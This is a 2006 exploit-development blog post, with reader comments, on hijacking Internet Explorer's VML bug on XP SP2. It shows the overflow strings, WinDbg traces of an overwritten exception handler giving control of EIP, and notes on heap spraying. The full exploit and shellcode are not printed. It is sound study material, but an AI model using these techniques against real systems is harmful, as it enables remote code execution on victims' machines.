Software Vulnerability Exploitation Blog

Sunday, September 24, 2006

Heap Spraying: Exploiting Internet Explorer VML 0-day XP SP2

Credits: Niega

At the first time, I decide the release the article at Oct 10. But there is someone already publish the exploit, so there is no means to still keep it private.

Last article, I had described that my method can't be used to exploit XP SP2. But things change because Niega give me some information that he could produce some error that different from the old one.

This exception may be expected and handled.
eax=0013be58 ebx=001cc564 ecx=0013be4c edx=00000041 esi=000020d4 edi=00140000
eip=6f9eed1e esp=0013be34 ebp=0013c05c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program\Delade filer\Microsoft Shared\VGX\vgx.dll -
vgx!$DllMain$_gdiplus+0x30e8d:
6f9eed1e 668917 mov word ptr [edi],dx ds:0023:00140000=6341

IE crashes, but not with the security cookie checking failure. This is the interesting one, may be I can made the code execution from this (the reason why I'm give up to find the way to made the exploit work on XP SP2 because there is others can do it). Niega said that he produce the error by overwrite the stack massively. I reproduce the error by create the attack vector like this:

...
$page = $page . "\x41\x41\x41\x41" x 65535;
...

It gives the same result:

(538.590): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling
This exception may be expected and handled.eax=0013be5c ebx=03148f2c ecx=0013be50 edx=00004141 esi=000020d2 edi=00140000eip=5deded1e esp=0013be38 ebp=0013c060 iopl=0 nv up ei pl nz na po nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
vgx!_IE5_SHADETYPE_TEXT::TOKENS::Ptok+0x38:
5deded1e 668917 mov [edi],dx ds:0023:00140000=6341

I look into the error to find the point that can lead to the code execution, but not found the interesting one. However, when I close WinDBG and open it again, something that I’m looking for is happened:

(538.590): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0013bfe0 ebx=0447a034 ecx=0013bfd4 edx=00004141 esi=00002010 edi=00140000
eip=5deded1e esp=0013bfbc ebp=0013c1e4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
vgx!_IE5_SHADETYPE_TEXT::TOKENS::Ptok+0x38:
5deded1e 668917 mov [edi],dx ds:0023:00140000=6341
0:000> g
(538.590): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000
eip=41414141 esp=0013bbec ebp=0013bc0c iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
41414141 ?? ???

Hey !!? eip jumps to address 0x41414141 - the value that we can control. Then I open my first version exploit, remove the heap spraying code section and modify the attack vector to this:

$page = $page . "\x0d\x0d\x0d\x0d" x 65535;

This is the result:

This exception may be expected and handled.
eax=0013bfe0 ebx=0334007c ecx=0013bfd4 edx=00000d0d esi=00002010 edi=00140000
eip=5deded1e esp=0013bfbc ebp=0013c1e4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
vgx!_IE5_SHADETYPE_TEXT::TOKENS::Ptok+0x38:
5deded1e 668917 mov [edi],dx ds:0023:00140000=6341
0:000> g
(bc.148): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=0d0d0d0d edx=7c9037d8 esi=00000000 edi=00000000
eip=0d0d0d0d esp=0013bbec ebp=0013bc0c iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
0d0d0d0d ?? ???

(I have to close WinDBG and open it again everytime to produce this result, I don’t know why ? If you know, plz tell me, lol)

Now we can control eip completely on XP SP2. I just enable the heap spraying code section again and use IE browse the exploit page. I see that IE is not crashed and my machine has opened port 5555 - the exploit success ^-^. I test it again without the debugger and it’s also OK – the exploit work with a little modification !!! Thanks Niega :)

Now, I will investigate deeply why a little modification can give me a big result. At the point IE crashes, I execute a single instruction at time:

0:000> p
eax=0013bfe0 ebx=0335007c ecx=0013bcf0 edx=00000d0d esi=00002010 edi=00140000
eip=7c90eaf0 esp=0013bccc ebp=0013c1e4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
ntdll!KiUserExceptionDispatcher+0x4:
7c90eaf0 8b1c24 mov ebx,[esp] ss:0023:0013bccc=0013bcd4

7c90eaf5 e8c78c0200 call ntdll!RtlDispatchException (7c9377c1)
0:000> p
(9d8.5e0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=0d0d0d0d edx=7c9037d8 esi=00000000 edi=00000000
eip=0d0d0d0d esp=0013bbec ebp=0013bc0c iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
0d0d0d0d ?? ???

IE calls ntdll!RtlDispatchException – 0x7c9377c1 – before it jump into 0x0d0d0d0d. This give me some clue that the massive bytes 0x0d will overwrite to some exception handler. I set breakpoint at 0x7c9377c1 to see more details:

Breakpoint 1 hit
eax=0013bfe0 ebx=0013bcd4 ecx=0013bcf0 edx=00000d0d esi=00002010 edi=00140000
eip=7c9377c1 esp=0013bcc0 ebp=0013c1e4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
ntdll!RtlDispatchException:
7c9377c1 8bff mov edi,edi
0:000> p
...
ntdll!RtlDispatchException+0xac:
7c93785b e8f3befcff call ntdll!RtlpExecuteHandlerForException (7c903753)
0:000> bp 7c903753
0:000> p
Breakpoint 2 hit
eax=0013bca8 ebx=0013eae8 ecx=0000c460 edx=7c90eb94 esi=0013bcd4 edi=00140000
eip=7c903753 esp=0013bc34 ebp=0013bcbc iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!RtlpExecuteHandlerForException:
7c903753 bad837907c mov edx,0x7c9037d8

Now it call ntdll!RtlpExecuteHandlerForException.

0:000> p
eax=0013bca8 ebx=0013eae8 ecx=0000c460 edx=7c9037d8 esi=0013bcd4 edi=00140000
eip=7c903758 esp=0013bc34 ebp=0013bcbc iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!RtlpExecuteHandlerForException+0x5:
7c903758 eb0d jmp ntdll!ExecuteHandler (7c903767)
...
ntdll!ExecuteHandler+0x1f:
7c903786 e80e000000 call ntdll!ExecuteHandler2 (7c903799)
0:000> bp 7c903799
0:000> p
Breakpoint 3 hit
eax=00000000 ebx=00000000 ecx=0000c460 edx=7c9037d8 esi=00000000 edi=00000000
eip=7c903799 esp=0013bc10 ebp=0013bcbc iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!ExecuteHandler2:
7c903799 55 push ebp

Then call ntdll!ExecuteHandler2.

...
eax=00000000 ebx=00000000 ecx=0000c460 edx=7c9037d8 esi=00000000 edi=00000000
eip=7c9037ba esp=0013bbf0 ebp=0013bc0c iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!ExecuteHandler2+0x21:
7c9037ba 8b4d18 mov ecx,[ebp+0x18] ss:0023:0013bc24=0d0d0d0d
0:000> p
eax=00000000 ebx=00000000 ecx=0d0d0d0d edx=7c9037d8 esi=00000000 edi=00000000
eip=7c9037bd esp=0013bbf0 ebp=0013bc0c iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!ExecuteHandler2+0x24:
7c9037bd ffd1 call ecx {0d0d0d0d}

As you can see, ecx is set to 0x0d0d0d0d at instruction address 0x7c9037ba. Then, the instruction "call ecx" is executed so the flow of execution will jump to 0x0d0d0d0d.

5 Comments:

  • hello
    very good bloge but link pic problem

    By Anonymous Anonymous, at September 26, 2006 9:05 AM  

  • very cool!

    By Anonymous Anonymous, at September 26, 2006 9:48 PM  

  • some exploits do not substract the size of the heap header to the size of the spray slide and are very reliable as well, why ?

    By Anonymous Anonymous, at September 27, 2006 6:16 PM  

  • Actually, substraction the size of the heap header style comes from the SkyLined's technique, but it is not impartant as heap spraying concept. The heap spraying concept is to fill the heaps as much as possible to made the memory become valid to jump into or others thing. As H D M show in his code, he just fill heaps with nop and it's work too.

    These 2 techniques will give the different results when u jump to the start of heap (heap header), but the possibility is less because heap header size is 20 when compare with the heap block 0x40000.

    That's why it's work :)

    By Blogger Trirat Puttaraksa, at September 28, 2006 2:56 PM  

  • ;) cool !

    By Anonymous Anonymous, at December 11, 2006 9:43 PM  

Post a Comment

<< Home